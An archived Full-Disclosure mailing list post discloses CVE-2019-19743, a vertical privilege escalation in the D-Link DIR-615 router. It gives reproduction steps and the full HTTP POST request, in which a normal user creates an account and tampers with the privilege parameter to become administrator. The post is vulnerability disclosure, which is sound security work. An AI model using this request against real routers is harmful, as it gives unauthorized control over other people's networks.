lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 16 Dec 2019 20:37:39 +0530
From: Sanyam Chawla <infosecsanyam@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] D-Link DIR-615 — Vertical Prviliege Escalation

######################################################################################

# Exploit Title: D-Link DIR-615 — Vertical Prviliege Escalation

# Date: 10.12.2019

# Exploit Author: Sanyam Chawla

# Vendor Homepage: http://www.dlink.co.in

# Category: Hardware (Wi-fi Router)

# Hardware Link: http://www.dlink.co.in/products/?pid=678

# Hardware Version: T1

# Firmware Version: 20.07

# Tested on: Windows 10 and Kali linux

# CVE: CVE-2019–19743

#######################################################################################



Reproduction Steps:

   1. Login to your wi-fi router gateway with normal user credentials [i.e:
   http://192.168.0.1]
   2. Go to the Maintenance page and click on Admin on the left panel.
   3. There is an option to create a user and by default, it shows only
   user accounts.
   <https://1.bp.blogspot.com/-f-MOwxhgrRI/XfUZSszN8TI/AAAAAAAAFb8/v2193GabEVYOO_Ax89FPrBymNTxXc32_wCLcBGAsYHQ/s1600/1.PNG>
   4. Create an account with a name(i.e ptguy) and change the privileges
   from user to root(admin) by changing privileges id (1 to 2) with burp suite.


Privilege Escalation Post Request

POST /form2userconfig.cgi HTTP/1.1

Host: 192.168.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0)
Gecko/20100101 Firefox/71.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 122

Origin: http://192.168.0.1

Connection: close

Referer: http://192.168.0.1/userconfig.htm

Cookie: SessionID=

Upgrade-Insecure-Requests: 1

username=ptguy&*privilege=2*&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send

       5. Now log in with newly created root (ptguy) user. You have all
administrator rights.


Please let me know if any other information required from my side for this
vulnerability.


Best Regards,

Sanyam Chawla

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists